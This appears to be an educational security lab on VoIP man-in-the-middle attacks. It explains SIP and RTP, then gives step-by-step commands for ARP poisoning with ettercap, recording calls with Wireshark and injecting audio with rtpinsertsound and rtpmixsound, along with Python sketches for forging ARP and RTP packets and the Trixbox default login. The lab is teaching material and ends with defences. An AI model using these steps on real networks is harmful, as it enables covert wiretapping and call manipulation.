This lab describes telephone signal tampering, a type of Man in the Middle attack that aims to insert, modify, or remove VoIP packets in order to alter a communication session.

The most common VoIP telephone infrastructures are based on two protocols: RTP and SIP.

RTP (Real-time Transport Protocol) is a network protocol for delivering audio and video over IP networks; it provides end-to-end network transport functions suitable for applications transmitting real-time data, such as telephony and video conferencing.

The Session Initiation Protocol (SIP) is a signaling protocol, used in both enterprise and provider environments, for establishing, modifying, and terminating multimedia sessions with one or more participants, such as Internet telephony calls. Its operation is very similar to HTTP, but it is peer-to-peer: any endpoint can act as a client or as a server. It has two types of messages: a Request, sent from the client to the server, and a Response, sent from the server to the client.

The Request message provides the following main methods:

  • INVITE: initiates a conversation;
  • ACK: acknowledges the final response to an INVITE request;
  • BYE: terminates a session between two users;
  • REGISTER: registers the current location of a SIP user;
  • OPTIONS: allows a UA to query another UA or a proxy server about its capabilities;
  • CANCEL: cancels a pending INVITE request.
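As a rough illustration of how these methods appear on the wire, the sketch below splits the first line of a SIP request into its method, Request-URI, and version. The function name `parse_request_line`, the sample message, and the domain `pbx.example.invalid` are assumptions made for this example; they are not taken from the lab setup.

```python
# The six request methods listed above (the core methods of RFC 3261).
SIP_METHODS = {"INVITE", "ACK", "BYE", "REGISTER", "OPTIONS", "CANCEL"}


def parse_request_line(message: str) -> tuple:
    """Split the first line of a SIP request into (method, request_uri, version)."""
    first_line = message.split("\r\n", 1)[0]
    parts = first_line.split(" ")
    if len(parts) != 3:
        raise ValueError(f"not a SIP request line: {first_line!r}")
    method, request_uri, version = parts
    if method not in SIP_METHODS:
        raise ValueError(f"method not covered in this lab: {method}")
    if version != "SIP/2.0":
        raise ValueError(f"unexpected SIP version: {version}")
    return method, request_uri, version


# Hypothetical INVITE from extension 1000 to extension 1001 (placeholder domain).
EXAMPLE_INVITE = (
    "INVITE sip:1001@pbx.example.invalid SIP/2.0\r\n"
    "From: <sip:1000@pbx.example.invalid>\r\n"
    "To: <sip:1001@pbx.example.invalid>\r\n"
    "CSeq: 1 INVITE\r\n"
    "\r\n"
)

if __name__ == "__main__":
    print(parse_request_line(EXAMPLE_INVITE))
```

Because SIP is a text protocol, an attacker who sits in the path can read these fields directly from the captured packets.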

SIP Response messages carry three-digit status codes, like HTTP:

  • 1xx for Information
  • 2xx for Successful
  • 3xx for Redirection
  • 4xx for Request failure
  • 5xx for Server failure
  • 6xx for Global failure
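The first digit alone determines the class of a response. A minimal sketch of that mapping follows, assuming a hypothetical helper named `classify_status_line` and using the class names from the list above.

```python
# Class names follow the list above; the key is the first digit of the code.
STATUS_CLASSES = {
    1: "Information",
    2: "Successful",
    3: "Redirection",
    4: "Request failure",
    5: "Server failure",
    6: "Global failure",
}


def classify_status_line(line: str) -> tuple:
    """Return (status_code, reason_phrase, class_name) for a SIP status line."""
    parts = line.strip().split(" ", 2)
    if len(parts) != 3:
        raise ValueError(f"not a SIP status line: {line!r}")
    version, code_text, reason = parts
    if version != "SIP/2.0" or len(code_text) != 3 or not code_text.isdigit():
        raise ValueError(f"not a SIP status line: {line!r}")
    code = int(code_text)
    class_name = STATUS_CLASSES.get(code // 100)
    if class_name is None:
        raise ValueError(f"status code outside 1xx-6xx: {code}")
    return code, reason, class_name


if __name__ == "__main__":
    for sample in ("SIP/2.0 180 Ringing", "SIP/2.0 200 OK", "SIP/2.0 486 Busy Here"):
        print(classify_status_line(sample))
```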

SIP architecture has five logical core components:

  • User agent (UA): a client application or device that initiates and terminates a SIP session.
  • Proxy server: a component that receives SIP requests from user agents and routes them to the appropriate next hop.
  • Redirect server: a server that answers the requests it receives with redirection responses.
  • Registrar server: a server that processes REGISTER requests to map SIP URIs to their current location.
  • Location server: used by a redirect server or proxy to find the callee's possible location.
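The interplay between registrar, location server, and proxy can be sketched with a toy in-memory model. Everything here (the `LocationService` class, `route_invite`, the placeholder domain and the 192.0.2.x documentation address) is hypothetical and only illustrates the roles; a real PBX such as Trixbox implements them very differently.

```python
from typing import Dict, Optional


class LocationService:
    """Toy in-memory store shared by a registrar and a proxy."""

    def __init__(self) -> None:
        self._bindings: Dict[str, str] = {}

    def register(self, address_of_record: str, contact: str) -> None:
        """What a registrar does on REGISTER: bind a SIP URI to a contact address."""
        self._bindings[address_of_record] = contact

    def lookup(self, address_of_record: str) -> Optional[str]:
        """What a proxy or redirect server asks: where is this user right now?"""
        return self._bindings.get(address_of_record)


def route_invite(location: LocationService, callee: str) -> str:
    """What a proxy does on INVITE: pick the next hop, or answer 404 Not Found."""
    contact = location.lookup(callee)
    if contact is None:
        return "404 Not Found"
    return f"forward to {contact}"


if __name__ == "__main__":
    location = LocationService()
    # Hypothetical binding for extension 1001 (documentation address range).
    location.register("sip:1001@pbx.example.invalid", "sip:1001@192.0.2.20:5060")
    print(route_invite(location, "sip:1001@pbx.example.invalid"))
    print(route_invite(location, "sip:1002@pbx.example.invalid"))
```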

Lab infrastructure

In this lab, to execute and explain VoIP call modification attacks, we use a Local Area Network scenario with the following VMs:

  • Kali Linux, as the attacker, with IP address:
  • Windows Server 2012 R2, as User Agent “A” (UA), with IP address:
  • Windows 7, as User Agent “B” (UA), with IP address:
  • Trixbox, as the VoIP server, with IP address:

The software tools required for this lab are:

  • Linphone app, a simple open source VoIP client.
  • Ettercap, a powerful suite for Man In The Middle attacks on a LAN.
  • Wireshark, the most popular network sniffing tool.
  • Rtpinsertsound, a tool to insert audio into a specified audio stream.
  • Rtpmixsound, a tool to mix pre-recorded audio in real-time with the audio in the specified target audio stream.
  • Sox, a command line utility that can convert various formats of audio files into other formats.

Step 0 – Setup VoIP configuration

To set up the VoIP configuration, we open the Trixbox web interface, which lets us manage the VoIP server through a web-based application. The default credentials of the Trixbox web interface are maint:password.

Now we add User Agent “A” and User Agent “B” by opening the PBX menu, then the PBX Settings tab.

In this tab we select the Extension button, then choose Generic SIP Device.

Finally, we enter the User Extension, its Display Name, and the Secret for this account.

In this lab, User Agent “A” uses User Extension 1000 and User Agent “B” uses User Extension 1001.

All the steps shown, including the commands, are executed on the Kali VM to reproduce the attacker’s view.

Exercise 1: Eavesdropping attack

VoIP eavesdropping is a type of network attack that aims to listen to other parties' communication sessions without authorization. An attacker can use it to capture content containing sensitive and confidential information.

Step 1 – ARP poisoning

This threat relies on the Man in the Middle concept, in which the attacker can read, insert, or modify messages between two communicating parties without either side knowing that the channel has been compromised by a third party. In a Local Area Network, the attack can be performed by poisoning the ARP cache with a spoofed MAC address. To communicate over a LAN, a host needs the destination's MAC address to deliver network packets correctly; the mapping between IP addresses and MAC addresses is managed by the Address Resolution Protocol (ARP) and stored in a local cache. This cache can be poisoned by forging and sending to a target ARP packets that associate the victim host's IP address with the attacker's MAC address.
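To make the forged packet concrete, the sketch below builds the 28-byte payload of a spoofed ARP reply with Python's `struct` module. It only constructs bytes and does not send anything. The function names, MAC addresses, and 192.0.2.x addresses are placeholders chosen for this example, not values from the lab.

```python
import socket
import struct


def mac_to_bytes(mac: str) -> bytes:
    """Convert 'aa:bb:cc:dd:ee:ff' into its 6 raw bytes."""
    return bytes.fromhex(mac.replace(":", ""))


def build_spoofed_arp_reply(attacker_mac: str, spoofed_ip: str,
                            victim_mac: str, victim_ip: str) -> bytes:
    """Build an ARP reply claiming that spoofed_ip is reachable at attacker_mac."""
    return struct.pack(
        "!HHBBH6s4s6s4s",
        1,                             # hardware type: Ethernet
        0x0800,                        # protocol type: IPv4
        6,                             # hardware address length
        4,                             # protocol address length
        2,                             # operation: reply
        mac_to_bytes(attacker_mac),    # sender MAC (the lie: attacker's MAC)
        socket.inet_aton(spoofed_ip),  # sender IP (the host being impersonated)
        mac_to_bytes(victim_mac),      # target MAC
        socket.inet_aton(victim_ip),   # target IP
    )


if __name__ == "__main__":
    # Placeholder addresses: the victim is told that the server's IP maps to the attacker's MAC.
    payload = build_spoofed_arp_reply(
        "02:00:00:00:00:aa", "192.0.2.10", "02:00:00:00:00:bb", "192.0.2.20"
    )
    print(len(payload), payload.hex())
```

A victim that accepts this reply overwrites its cache entry for the impersonated IP address, which is the effect Ettercap automates in both directions.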

To demonstrate these concepts, we use Ettercap, which supports many types of MITM attack, including ARP poisoning.

To run the ARP poisoning attack with Ettercap, we can run the following command:

$ ettercap -T -M arp:remote -i eth0 / /

// -T = text-only interface

// -M = type of man in the middle attack

// -i = interface

// / = User agent victim

// / = VoIP server

Step 2 – Starting a VoIP call

To analyze a VoIP call in the next steps, we start a call with our VoIP client application, Linphone, from User Agent “A” (Extension 1000) to User Agent “B” (Extension 1001). First, we register our account with the lab's VoIP server through the preferences dashboard, located in the options menu, entering the configuration defined previously: User Extension, password, and VoIP domain.

After opening the client on User Agent “A”, we type the destination User Extension and press Call.

Finally, we answer the call in the Linphone client on the other side.

Step 3 – Sniffing packets

With ARP poisoning running, we can begin sniffing the VoIP conversation with Wireshark. After launching it with the $ wireshark command, we select the eth0 network interface and click the start capturing button to sniff the traffic. After a few seconds, we can see the SIP and RTP packets in the capture.
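The two kinds of packet are easy to tell apart: SIP is text whose first line contains "SIP/2.0", while an RTP packet starts with a binary header whose top two bits carry version 2. The sketch below applies that heuristic to a raw UDP payload. It is a simplification written for this lab, with an assumed function name `classify_udp_payload`; it is not how Wireshark's dissectors decide, and RTCP or unrelated traffic can also match the RTP test.

```python
def classify_udp_payload(payload: bytes) -> str:
    """Guess whether a UDP payload is SIP, RTP, or something else."""
    first_line = payload.split(b"\r\n", 1)[0]
    # SIP requests end their first line with the version; responses start with it.
    if first_line.endswith(b" SIP/2.0") or first_line.startswith(b"SIP/2.0 "):
        return "SIP"
    # An RTP fixed header is 12 bytes long and its top two bits hold version 2.
    if len(payload) >= 12 and payload[0] >> 6 == 2:
        return "RTP"
    return "other"


if __name__ == "__main__":
    sip_sample = b"INVITE sip:1001@pbx.example.invalid SIP/2.0\r\n\r\n"  # placeholder domain
    rtp_sample = bytes([0x80, 0x00]) + bytes(10) + b"\xff" * 160         # header + dummy audio
    for sample in (sip_sample, rtp_sample, b"hello"):
        print(classify_udp_payload(sample))
```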

Step 4 – Graph analysis

To analyze the packets offline, we stop the capture with the corresponding button. The VoIP packets can then be analyzed to view the whole communication and understand its flow. To do this, we open the Telephony menu in Wireshark, select VoIP Calls, and then click Flow.

Step 5 – Listen to conversation

Wireshark can analyze the RTP packets as well as the session signaling: it can reassemble the packets, decode them, and play back the communication flow so that we can listen to the whole conversation. To do so, we open the Telephony menu and select VoIP Calls, then select a conversation and click the Player button to load the packets. We can then play the communication using the Decode and Play commands.

Step 6 – Save the conversation

In this step, we save the conversation so that it can be reused later in the next attack. To save the conversation as audio with Wireshark, we follow this path: Telephony menu -> RTP -> Show All Streams, then choose a stream and select Analyze -> Save payload in .au format.

Step 7 – Convert the audio conversation format

The audio file is saved in the au format, which many players cannot read, so we convert it to wav format. We can do this with Sox, the “Swiss army knife” of sound processing programs, which converts our audio file into the required format. This utility is available in the Debian repository, so we can install it on the Kali Linux VM with the following command:

$ apt-get install sox

After the quick install, we can convert our file into wav format with the following command:

$ sox -r 8000 -V sample.wav

// -r Sets the sample rate to 8000 Hz

// -V Verbose output

// is the audio input, the conversation saved in the previous step

// sample.wav is the audio output in wav format
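For readers curious about what such a conversion involves, here is a minimal Python sketch that reads an AU header, expands 8-bit mu-law samples to 16-bit PCM, and writes a WAV file with the standard `wave` module. It assumes the saved payload uses AU encoding 1 (8-bit mu-law, as used by G.711 calls) and rejects anything else; the function names are invented for this example, and Sox itself handles far more formats.

```python
import io
import struct
import wave

AU_MAGIC = 0x2E736E64        # the ASCII bytes ".snd"
AU_ENCODING_ULAW_8BIT = 1    # assumption: the capture was saved as 8-bit mu-law


def ulaw_to_pcm16(value: int) -> int:
    """Expand one G.711 mu-law byte to a signed 16-bit linear sample."""
    value = ~value & 0xFF
    magnitude = (((value & 0x0F) << 3) + 0x84) << ((value >> 4) & 0x07)
    return 0x84 - magnitude if value & 0x80 else magnitude - 0x84


def au_ulaw_to_wav(au_bytes: bytes, wav_file) -> int:
    """Convert mu-law AU data to 16-bit PCM WAV; returns the number of frames written."""
    if len(au_bytes) < 24:
        raise ValueError("AU header is at least 24 bytes long")
    magic, offset, _size, encoding, rate, channels = struct.unpack(">6I", au_bytes[:24])
    if magic != AU_MAGIC:
        raise ValueError("missing .snd magic number")
    if encoding != AU_ENCODING_ULAW_8BIT:
        raise ValueError(f"unsupported AU encoding: {encoding}")
    samples = [ulaw_to_pcm16(b) for b in au_bytes[offset:]]
    pcm = struct.pack(f"<{len(samples)}h", *samples)
    with wave.open(wav_file, "wb") as wav:
        wav.setnchannels(channels)
        wav.setsampwidth(2)       # 16-bit output samples
        wav.setframerate(rate)
        wav.writeframes(pcm)
    return len(samples) // channels


if __name__ == "__main__":
    # Tiny synthetic input: 24-byte header followed by three mu-law bytes.
    au = struct.pack(">6I", AU_MAGIC, 24, 3, AU_ENCODING_ULAW_8BIT, 8000, 1)
    au += bytes([0xFF, 0x80, 0x00])
    out = io.BytesIO()
    print(au_ulaw_to_wav(au, out), "frames written")
```

To convert a real file, the same function can be called with the file's bytes and an output path such as "sample.wav" in place of the in-memory buffer.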

Exercise 2: RTP packet tampering

Once the Man in the Middle attack has been performed successfully to eavesdrop on conversations, we can alter the communication flow by inserting or replacing RTP packets. Conducted properly, this attack lets us modify the conversation by inserting pieces of pre-recorded audio. The attack succeeds because RTP is vulnerable to media tampering, especially when it is used without encryption and over the connectionless transport protocol UDP.

An RTP stream between two VoIP endpoints is identified and ordered by its SSRC (Synchronization Source identifier), sequence number, and timestamp. An attacker can capture the RTP packets and replicate them with the same SSRC and a greater sequence number and timestamp, so that the destination endpoint accepts the attacker’s packets, because they have a higher sequence number, and discards the legitimate ones.
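These three fields sit in the 12-byte fixed RTP header defined in RFC 3550. The sketch below parses that header and builds the header of a follow-up packet that keeps the SSRC while advancing the sequence number and timestamp. The names `RtpHeader`, `parse_rtp_header`, and `next_header` are made up for this example, and the step of 160 samples per packet assumes 20 ms of 8 kHz audio; neither is taken from the tools used in this lab.

```python
import struct
from typing import NamedTuple


class RtpHeader(NamedTuple):
    version: int
    payload_type: int
    sequence: int
    timestamp: int
    ssrc: int


def parse_rtp_header(packet: bytes) -> RtpHeader:
    """Decode the 12-byte fixed RTP header (RFC 3550, section 5.1)."""
    if len(packet) < 12:
        raise ValueError("RTP fixed header is 12 bytes long")
    byte0, byte1, sequence, timestamp, ssrc = struct.unpack("!BBHII", packet[:12])
    return RtpHeader(byte0 >> 6, byte1 & 0x7F, sequence, timestamp, ssrc)


def next_header(observed: RtpHeader, seq_step: int = 1,
                samples_per_packet: int = 160) -> bytes:
    """Build a header that continues the observed stream.

    Same SSRC, higher sequence number and timestamp; both counters wrap
    around at their field width (16 and 32 bits).
    """
    sequence = (observed.sequence + seq_step) & 0xFFFF
    timestamp = (observed.timestamp + seq_step * samples_per_packet) & 0xFFFFFFFF
    # 0x80 = version 2, no padding, no extension, no CSRC entries.
    return struct.pack("!BBHII", 0x80, observed.payload_type,
                       sequence, timestamp, observed.ssrc)


if __name__ == "__main__":
    # Synthetic captured header: payload type 0 (PCMU), arbitrary counters and SSRC.
    captured = struct.pack("!BBHII", 0x80, 0, 100, 16000, 0x1234ABCD)
    header = parse_rtp_header(captured)
    print(header)
    print(parse_rtp_header(next_header(header)))
```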


Step 8 – Insert file audio

To demonstrate this scenario, we use the Rtpinsertsound tool, which inserts RTP messages into the target audio stream; here it injects the sample.wav file prepared in Step 7 into the communication stream. We run the following command:

$ rtpinsertsound -v -i eth0 -a -A 11198 -b -B 7078 -f 1 -j 50 sample.wav

// -v Verbose output

// -i Network interface

// -a Source IP address

// -A Source UDP port

// -b Destination IP address

// -B Destination UDP port

// -f Spoof factor

// -j Jitter factor, determining when to transmit a packet as a percentage of the target audio stream’s transmission interval

As a result of this manipulation, during the VoIP call the destination user hears the wav file instead of the real speech, which is effectively muted: the victim's endpoint plays the injected sample and discards the legitimate packets for the whole duration of the sample.

Step 9 – Insert mix file audio

We also used a similar tool, Rtpmixsound, which mixes pre-recorded audio in real time with the audio of the target stream. We can use this tool by running the following command:

$ rtpmixsound -i eth0 -a -A 14312 -b -B 7078 sample_mix.wav

// -i Network interface

// -a Source IP address

// -A Source UDP port

// -b Destination IP address

// -B Destination UDP port

The difference with this tool is that the user at the receiving end can still hear the person at the transmitting end speaking throughout the playback of the bogus pre-recorded audio.
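Mixing, as opposed to replacing, amounts to adding the two signals sample by sample. The sketch below shows a generic way to do this for 16-bit PCM samples, clamping the sum so it stays in range. It illustrates the idea only: the source does not describe how Rtpmixsound mixes audio internally, and the function name `mix_pcm16` is invented for this example.

```python
def mix_pcm16(call_audio: list, injected_audio: list) -> list:
    """Add injected samples onto the call's samples, clamped to the int16 range.

    The result has the length of call_audio; once the injected audio runs out,
    the original samples pass through unchanged.
    """
    mixed = []
    for index, sample in enumerate(call_audio):
        extra = injected_audio[index] if index < len(injected_audio) else 0
        mixed.append(max(-32768, min(32767, sample + extra)))
    return mixed


if __name__ == "__main__":
    legitimate = [1000, -2000, 30000, 5]   # synthetic samples of the real speaker
    bogus = [500, 500, 10000]              # synthetic samples of the pre-recorded audio
    print(mix_pcm16(legitimate, bogus))
```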


This lab focused on call session modification attacks, introducing the eavesdropping and RTP packet tampering attacks.

To protect a VoIP infrastructure from this type of attack, we should encrypt the channel with a scheme such as SVoIP (Secure VoIP), which secures the VoIP clients, or VoSIP (Voice over Secure IP), which secures the VoIP network. In this way, we can protect the confidentiality, integrity, and availability of the communication session, although it may degrade performance. Furthermore, a VoIP-oriented firewall or IDS/IPS is recommended to monitor RTP traffic and detect or block audio insertion threats.
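As an idea of what RTP monitoring could look for, the sketch below flags sequence-number anomalies within each SSRC: duplicates, backward steps, and large forward jumps. It is a simple heuristic written for this lab, with an assumed function name and an arbitrary threshold of 50; ordinary packet loss or reordering can also trigger it, so it is not a description of any particular IDS product.

```python
def find_sequence_anomalies(packets, max_jump: int = 50) -> list:
    """Scan (ssrc, sequence) pairs in arrival order and return (index, reason) alerts."""
    last_seq = {}
    alerts = []
    for index, (ssrc, sequence) in enumerate(packets):
        previous = last_seq.get(ssrc)
        if previous is not None:
            delta = (sequence - previous) & 0xFFFF   # 16-bit wraparound
            if delta == 0:
                alerts.append((index, "duplicate sequence number"))
            elif delta > 0x8000:
                alerts.append((index, "sequence number went backwards"))
                continue   # keep the highest sequence number as the reference
            elif delta > max_jump:
                alerts.append((index, "large forward jump"))
        last_seq[ssrc] = sequence
    return alerts


if __name__ == "__main__":
    ssrc = 0x1234ABCD   # arbitrary stream identifier
    # An injected packet takes number 103 before the legitimate packet 103 arrives.
    stream = [(ssrc, 100), (ssrc, 101), (ssrc, 102), (ssrc, 103), (ssrc, 103), (ssrc, 104)]
    print(find_sequence_anomalies(stream))
```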


  • Hacking Exposed VoIP: Voice Over IP Security Secrets & Solutions
  • RFC 3261 SIP: Session Initiation Protocol
  • RFC 3550 RTP: A Transport Protocol for Real-Time Applications